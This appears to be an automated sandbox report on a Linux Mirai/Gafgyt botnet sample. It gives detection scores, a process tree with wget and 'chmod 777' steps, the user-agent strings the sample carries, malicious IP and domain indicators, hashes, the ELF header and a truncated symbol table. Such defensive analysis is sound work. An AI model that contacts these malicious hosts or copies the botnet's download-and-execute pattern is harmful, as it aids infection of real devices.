        Source: /usr/bin/chmod (PID: 5534) File: /tmp/..... (bits: - usr: rwx grp: rwx all: rwx)
        Source: /bin/sh (PID: 5534) Chmod executable with 777: /usr/bin/chmod -> chmod 777 .....
        Source: /usr/bin/wget (PID: 5533) Queries kernel information via 'uname':

        Stealing of Sensitive Information

        Source: Yara match File source: x86.elf, type: SAMPLE
        Source: Yara match File source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara match File source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara match File source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTR
        Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
        Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
        Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
        Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
        Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
        Source: Initial sample User agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Source: Initial sample User agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
        Source: Initial sample User agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
        Source: Initial sample User agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: Initial sample User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
        Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

        Remote Access Functionality

        Source: Yara match File source: x86.elf, type: SAMPLE
        Source: Yara match File source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara match File source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara match File source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTR
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 Hide Artifacts | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 File and Directory Permissions Modification | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Hidden Files and Directories | Security Account Manager | 1 Remote System Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File Deletion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
        No configs have been found
        [Behavior graph, ID 1686581: sample x86.elf, start date 10/05/2025, architecture LINUX, score 96. Process tree: x86.elf starts sh and further x86.elf processes; sh starts sh, wget, chmod and rm. Network nodes: 92.60.77.69 (AS-IRIDEOS-KPIT, Italy), gay.energy, daisy.ubuntu.com. Signatures shown: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Opens /proc/net/* files useful for finding connected devices and routers; 4 other signatures.]
        Source | Detection | Scanner | Label
        x86.elf | 62% | Virustotal |
        x86.elf | 69% | ReversingLabs | Linux.Trojan.LnxGafgyt
        x86.elf | 100% | Avira | LINUX/Mirai.Gafgyt.
        No Antivirus matches
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        daisy.ubuntu.com | 162.213.35.25 | true | false | | high
        gay.energy | unknown | unknown | true | | unknown

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        92.60.77.69 | unknown | Italy | | 5602 | AS-IRIDEOS-KPIT | true
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            daisy.ubuntu.com | arm5.elf | malicious | Unknown | 162.213.35.25
            daisy.ubuntu.com | arm6.elf | malicious | Gafgyt | 162.213.35.24
            daisy.ubuntu.com | rep.arc.elf | malicious | Unknown | 162.213.35.24
            daisy.ubuntu.com | arm6.elf | malicious | Mirai | 162.213.35.25
            daisy.ubuntu.com | Space.arm5.elf | malicious | Unknown | 162.213.35.24
            daisy.ubuntu.com | Space.spc.elf | malicious | Mirai | 162.213.35.25
            daisy.ubuntu.com | O4WmcV1laq.elf | malicious | Unknown | 162.213.35.25
            daisy.ubuntu.com | onNhrf5u66.elf | malicious | Unknown | 162.213.35.24
            daisy.ubuntu.com | NkUW8QQONi.elf | malicious | BPFDoor | 162.213.35.24
            daisy.ubuntu.com | 7T1E6ZHN3w.elf | malicious | Unknown | 162.213.35.24

            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            AS-IRIDEOS-KPIT | armv4l.elf | malicious | Unknown | 193.28.95.59
            AS-IRIDEOS-KPIT | nullnet_load.arm7.elf | malicious | Mirai | 109.233.129.42
            AS-IRIDEOS-KPIT | 8427xbk3Zt.elf | malicious | Unknown | 109.233.130.43
            No context
            No context
            No created / dropped files found
            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
            Entropy (8bit):5.861227442959651
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:x86.elf
            File size:136'901 bytes
            MD5:b1a9dfc6e42c89e400efad9451540b1e
            SHA1:90bec36b5d46d4f4d06d19360d217b474c9d3f32
            SHA256:5f0788259247b6d55e2d7dc87bd5ef445472cd3132b38971b3f252ee8f8ed91e
            SHA512:f38b21e75bed988979c6c08d4db928649e4a6a169787052883005e0a7bb6d1eed9928edb696a74d1840139c05ce4828707fd7c637e6399b94d722d2e8901dfdc
            SSDEEP:3072:IObua3oWiWwqgU+MdZKtXO8TmqFV+ickmr1zwT2WNn:zo85dmn3fckmr1zwT2WNn
            TLSH:8BD31937D16584BAC08712F116EFC632AD63BCFB073121572394BEA05F3289ADE99746

            ELF header

            Class:ELF64
            Data:2's complement, little endian
            Version:1 (current)
            Machine:Advanced Micro Devices X86-64
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x400194
            Flags:0x0
            ELF Header Size:64
            Program Header Offset:64
            Program Header Size:56
            Number of Program Headers:3
            Section Header Offset:105912
            Section Header Size:64
            Number of Section Headers:15
            Header String Table Index:12
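            Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
             | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
            .init | PROGBITS | 0x4000e8 | 0xe8 | 0x13 | 0x0 | 0x6 | AX | 0 | 0 | 1
            .text | PROGBITS | 0x400100 | 0x100 | 0xfed4 | 0x0 | 0x6 | AX | 0 | 0 | 16
            .fini | PROGBITS | 0x40ffd4 | 0xffd4 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 1
            .rodata | PROGBITS | 0x410000 | 0x10000 | 0x51f0 | 0x0 | 0x2 | A | 0 | 0 | 32
            .eh_frame | PROGBITS | 0x516000 | 0x16000 | 0x2b9c | 0x0 | 0x3 | WA | 0 | 0 | 8
            .ctors | PROGBITS | 0x518ba0 | 0x18ba0 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
            .dtors | PROGBITS | 0x518bb0 | 0x18bb0 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
            .jcr | PROGBITS | 0x518bc0 | 0x18bc0 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8
            .data | PROGBITS | 0x518be0 | 0x18be0 | 0x558 | 0x0 | 0x3 | WA | 0 | 0 | 32
            .bss | NOBITS | 0x519140 | 0x19138 | 0x6cf8 | 0x0 | 0x3 | WA | 0 | 0 | 32
            .comment | PROGBITS | 0x0 | 0x19138 | 0xc18 | 0x0 | 0x0 | | 0 | 0 | 1
            .shstrtab | STRTAB | 0x0 | 0x19d50 | 0x66 | 0x0 | 0x0 | | 0 | 0 | 1
            .symtab | SYMTAB | 0x0 | 0x1a178 | 0x4db8 | 0x18 | 0x0 | | 14 | 291 | 8
            .strtab | STRTAB | 0x0 | 0x1ef30 | 0x2795 | 0x0 | 0x0 | | 0 | 0 | 1

            Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
            LOAD | 0x0 | 0x400000 | 0x400000 | 0x151f0 | 0x151f0 | 6.3971 | 0x5 | R E | 0x100000 | | .init .text .fini .rodata
            LOAD | 0x16000 | 0x516000 | 0x516000 | 0x3138 | 0x9e38 | 3.5764 | 0x6 | RW | 0x100000 | | .eh_frame .ctors .dtors .jcr .data .bss
            GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 | |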
            Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx
            __pagesize.symtab0x51f4108OBJECT<unknown>DEFAULT10
            __preinit_array_end.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __preinit_array_start.symtab0x518b9c0NOTYPE<unknown>HIDDENSHN_ABS
            __progname.symtab0x5191108OBJECT<unknown>DEFAULT9
            __progname_full.symtab0x5191188OBJECT<unknown>DEFAULT9
            __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            __pthread_mutex_init.symtab0x40b3cf3FUNC<unknown>DEFAULT2
            __pthread_mutex_lock.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __pthread_mutex_trylock.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __pthread_mutex_unlock.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __pthread_return_0.symtab0x40b3cc3FUNC<unknown>DEFAULT2
            __read_etc_hosts_r.symtab0x40fc6a518FUNC<unknown>HIDDEN2
            __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            __res_sync.symtab0x51fe188OBJECT<unknown>HIDDEN10
            __resolv_attempts.symtab0x5191251OBJECT<unknown>HIDDEN9
            __resolv_lock.symtab0x51f44040OBJECT<unknown>DEFAULT10
            __resolv_timeout.symtab0x5191241OBJECT<unknown>HIDDEN9
            __restore_rt.symtab0x40b7240NOTYPE<unknown>DEFAULT2
            __rtld_fini.symtab0x51f4208OBJECT<unknown>HIDDEN10
            __searchdomain.symtab0x51fe208OBJECT<unknown>HIDDEN10
            __searchdomains.symtab0x51fe344OBJECT<unknown>HIDDEN10
            __sigaddset.symtab0x4096f428FUNC<unknown>DEFAULT2
            __sigdelset.symtab0x40971030FUNC<unknown>DEFAULT2
            __sigismember.symtab0x4096d432FUNC<unknown>DEFAULT2
            __stdin.symtab0x518d988OBJECT<unknown>DEFAULT9
            __stdio_READ.symtab0x40e21858FUNC<unknown>HIDDEN2
            __stdio_WRITE.symtab0x40c124150FUNC<unknown>HIDDEN2
            __stdio_adjust_position.symtab0x40e254131FUNC<unknown>HIDDEN2
            __stdio_fwrite.symtab0x40c3f0259FUNC<unknown>HIDDEN2
            __stdio_init_mutex.symtab0x407adb15FUNC<unknown>HIDDEN2
            __stdio_mutex_initializer.4911.symtab0x41387040OBJECT<unknown>DEFAULT4
            __stdio_rfill.symtab0x40e2d837FUNC<unknown>HIDDEN2
            __stdio_seek.symtab0x40e35c31FUNC<unknown>HIDDEN2
            __stdio_trans2r_o.symtab0x40e30090FUNC<unknown>HIDDEN2
            __stdio_trans2w_o.symtab0x40c4f4149FUNC<unknown>HIDDEN2
            __stdio_wcommit.symtab0x407b7439FUNC<unknown>HIDDEN2
            __stdout.symtab0x518da08OBJECT<unknown>DEFAULT9
            __syscall_error.symtab0x40b6dc22FUNC<unknown>HIDDEN2
            __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __uClibc_fini.symtab0x40b3ec70FUNC<unknown>DEFAULT2
            __uClibc_init.symtab0x40b46758FUNC<unknown>DEFAULT2
            __uClibc_main.symtab0x40b4a1570FUNC<unknown>DEFAULT2
            __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __uclibc_progname.symtab0x5191088OBJECT<unknown>HIDDEN9
            __vfork.symtab0x4074c421FUNC<unknown>HIDDEN2
            __xpg_strerror_r.symtab0x4092d4196FUNC<unknown>DEFAULT2
            __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __xstat32_conv.symtab0x40deb4172FUNC<unknown>HIDDEN2
            __xstat64_conv.symtab0x40de08172FUNC<unknown>HIDDEN2
            __xstat_conv.symtab0x40df60172FUNC<unknown>HIDDEN2
            _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _bss_custom_printf_spec.symtab0x51f1f010OBJECT<unknown>DEFAULT10
            _charpad.symtab0x407b9c77FUNC<unknown>DEFAULT2
            _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _custom_printf_arginfo.symtab0x51f68080OBJECT<unknown>HIDDEN10
            _custom_printf_handler.symtab0x51f6d080OBJECT<unknown>HIDDEN10
            _custom_printf_spec.symtab0x518f908OBJECT<unknown>HIDDEN9
            _dl_aux_init.symtab0x40dd7023FUNC<unknown>DEFAULT2
            _dl_phdr.symtab0x51fe088OBJECT<unknown>DEFAULT10
            _dl_phnum.symtab0x51fe108OBJECT<unknown>DEFAULT10
            _edata.symtab0x5191380NOTYPE<unknown>DEFAULTSHN_ABS
            _end.symtab0x51fe380NOTYPE<unknown>DEFAULTSHN_ABS
            _errno.symtab0x51f4284OBJECT<unknown>DEFAULT10
            _exit.symtab0x40784443FUNC<unknown>DEFAULT2
            _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _fini.symtab0x40ffd40FUNC<unknown>DEFAULT3
            _fixed_buffers.symtab0x51d1f08192OBJECT<unknown>DEFAULT10
            _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _fp_out_narrow.symtab0x407be9120FUNC<unknown>DEFAULT2
            _fpmaxtostr.symtab0x40c6e01565FUNC<unknown>HIDDEN2
            _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _h_errno.symtab0x51f42c4OBJECT<unknown>DEFAULT10
            _init.symtab0x4000e80FUNC<unknown>DEFAULT1
            _load_inttype.symtab0x40c58c85FUNC<unknown>HIDDEN2
            _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_init.symtab0x408318114FUNC<unknown>HIDDEN2
            _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_parsespec.symtab0x4085b21126FUNC<unknown>HIDDEN2
            _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_prepargs.symtab0x40838c67FUNC<unknown>HIDDEN2
            _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _ppfs_setargs.symtab0x4083d0436FUNC<unknown>HIDDEN2
            _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _promoted_size.symtab0x40858446FUNC<unknown>DEFAULT2
            _pthread_cleanup_pop_restore.symtab0x40b3da18FUNC<unknown>DEFAULT2
            _pthread_cleanup_push_defer.symtab0x40b3d28FUNC<unknown>DEFAULT2
            _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _sigintr.symtab0x51f7208OBJECT<unknown>HIDDEN10
            _start.symtab0x40019442FUNC<unknown>DEFAULT2
            _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _stdio_fopen.symtab0x40c1bc563FUNC<unknown>HIDDEN2
            _stdio_init.symtab0x407a7c95FUNC<unknown>HIDDEN2
            _stdio_openlist.symtab0x518da88OBJECT<unknown>DEFAULT9
            _stdio_openlist_add_lock.symtab0x518db040OBJECT<unknown>DEFAULT9
            _stdio_openlist_dec_use.symtab0x40cdf4216FUNC<unknown>HIDDEN2
            _stdio_openlist_del_count.symtab0x51d1e44OBJECT<unknown>DEFAULT10
            _stdio_openlist_del_lock.symtab0x518de040OBJECT<unknown>DEFAULT9
            _stdio_openlist_use_count.symtab0x51d1e04OBJECT<unknown>DEFAULT10
            _stdio_streams.symtab0x518e10384OBJECT<unknown>DEFAULT9
            _stdio_term.symtab0x407aea135FUNC<unknown>HIDDEN2
            _stdio_user_locking.symtab0x518e084OBJECT<unknown>DEFAULT9
            _stdlib_strto_l.symtab0x40ad64339FUNC<unknown>HIDDEN2
            _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _store_inttype.symtab0x40c5e446FUNC<unknown>HIDDEN2
            _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _string_syserrmsgs.symtab0x4139702906OBJECT<unknown>HIDDEN4
            _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _uintmaxtostr.symtab0x40c614201FUNC<unknown>HIDDEN2
            _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _vfprintf_internal.symtab0x407c611716FUNC<unknown>HIDDEN2
            _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            abort.symtab0x40a8a0200FUNC<unknown>DEFAULT2
            abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            access.symtab0x40761841FUNC<unknown>DEFAULT2
            access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            acnc.symtab0x40346e161FUNC<unknown>DEFAULT2
            add_entry.symtab0x406abb99FUNC<unknown>DEFAULT2
            atoi.symtab0x40ad4418FUNC<unknown>DEFAULT2
            atoi.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            bcopy.symtab0x4092b814FUNC<unknown>DEFAULT2
            bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            been_there_done_that.symtab0x51f3f04OBJECT<unknown>DEFAULT10
            brk.symtab0x40dd8843FUNC<unknown>DEFAULT2
            brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            bsd_signal.symtab0x40964c133FUNC<unknown>DEFAULT2
            buf.5765.symtab0x51f210448OBJECT<unknown>DEFAULT10
            bzero.symtab0x408fc0210FUNC<unknown>DEFAULT2
            c.symtab0x518d484OBJECT<unknown>DEFAULT9
            calloc.symtab0x40a02c248FUNC<unknown>DEFAULT2
            calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            checksum_generic.symtab0x4001c0114FUNC<unknown>DEFAULT2
            checksum_tcp_udp.symtab0x400232222FUNC<unknown>DEFAULT2
            checksum_tcpudp.symtab0x400310222FUNC<unknown>DEFAULT2
            clock.symtab0x4078f446FUNC<unknown>DEFAULT2
            clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            clock_getres.symtab0x40b81441FUNC<unknown>DEFAULT2
            clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            close.symtab0x4078a041FUNC<unknown>DEFAULT2
            close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            closedir.symtab0x40b948147FUNC<unknown>DEFAULT2
            closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            closenameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            completed.5150.symtab0x5191401OBJECT<unknown>DEFAULT10
            connect.symtab0x4094b043FUNC<unknown>DEFAULT2
            connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            connectTimeout.symtab0x4019ce582FUNC<unknown>DEFAULT2
            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            csum.symtab0x401d16116FUNC<unknown>DEFAULT2
            data_start.symtab0x518bf00NOTYPE<unknown>DEFAULT9
            decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            dup2.symtab0x4074dc44FUNC<unknown>DEFAULT2
            dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            environ.symtab0x51f4088OBJECT<unknown>DEFAULT10
            errno.symtab0x51f4284OBJECT<unknown>DEFAULT10
            errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            execl.symtab0x40b278287FUNC<unknown>DEFAULT2
            execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            execve.symtab0x40b7d038FUNC<unknown>DEFAULT2
            execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            exit.symtab0x40aeb892FUNC<unknown>DEFAULT2
            exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            exp10_table.symtab0x414d30208OBJECT<unknown>DEFAULT4
            fclose.symtab0x40c008269FUNC<unknown>DEFAULT2
            fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fcntl.symtab0x4076e8100FUNC<unknown>DEFAULT2
            fd_to_DIR.symtab0x40b9dc149FUNC<unknown>DEFAULT2
            fdgets.symtab0x4014a3130FUNC<unknown>DEFAULT2
            fdopen_pids.symtab0x51d1c08OBJECT<unknown>DEFAULT10
            fdopendir.symtab0x40bb0e115FUNC<unknown>DEFAULT2
            fdpclose.symtab0x40137b296FUNC<unknown>DEFAULT2
            fdpopen.symtab0x4011a2473FUNC<unknown>DEFAULT2
            fflush_unlocked.symtab0x40cecc322FUNC<unknown>DEFAULT2
            fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgetc.symtab0x40cd00128FUNC<unknown>DEFAULT2
            fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgetc_unlocked.symtab0x40d010222FUNC<unknown>DEFAULT2
            fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgets.symtab0x40cd80116FUNC<unknown>DEFAULT2
            fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fgets_unlocked.symtab0x40d0f0116FUNC<unknown>DEFAULT2
            fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            findRandIP.symtab0x401ce747FUNC<unknown>DEFAULT2
            fmt.symtab0x414d1020OBJECT<unknown>DEFAULT4
            fopen.symtab0x40c11810FUNC<unknown>DEFAULT2
            fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fork.symtab0x4075e838FUNC<unknown>DEFAULT2
            fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fputs_unlocked.symtab0x408a1856FUNC<unknown>DEFAULT2
            fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            frame_dummy.symtab0x4001500FUNC<unknown>DEFAULT2
            free.symtab0x40a6c1451FUNC<unknown>DEFAULT2
            free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fseek.symtab0x40e12c5FUNC<unknown>DEFAULT2
            fseeko.symtab0x40e12c5FUNC<unknown>DEFAULT2
            fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fseeko64.symtab0x40e134225FUNC<unknown>DEFAULT2
            fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fstat.symtab0x40ddb482FUNC<unknown>DEFAULT2
            fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            fstat64.symtab0x40ddb482FUNC<unknown>DEFAULT2
            fwrite_unlocked.symtab0x408a50128FUNC<unknown>DEFAULT2
            fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getBuild.symtab0x4058ec6FUNC<unknown>DEFAULT2
            getHost.symtab0x4016aa65FUNC<unknown>DEFAULT2
            getOurIP.symtab0x405709483FUNC<unknown>DEFAULT2
            get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getc.symtab0x40cd00128FUNC<unknown>DEFAULT2
            getc_unlocked.symtab0x40d010222FUNC<unknown>DEFAULT2
            getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getdtablesize.symtab0x40769836FUNC<unknown>DEFAULT2
            getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getegid.symtab0x40b8688FUNC<unknown>DEFAULT2
            getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            geteuid.symtab0x4075e08FUNC<unknown>DEFAULT2
            geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            getgid.symtab0x40b8bc8FUNC<unknown>DEFAULT2
            getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname.symtab0x40946010FUNC<unknown>DEFAULT2
            gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname2.symtab0x40946c65FUNC<unknown>DEFAULT2
            gethostbyname2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            gethostbyname2_r.symtab0x40da60761FUNC<unknown>DEFAULT2
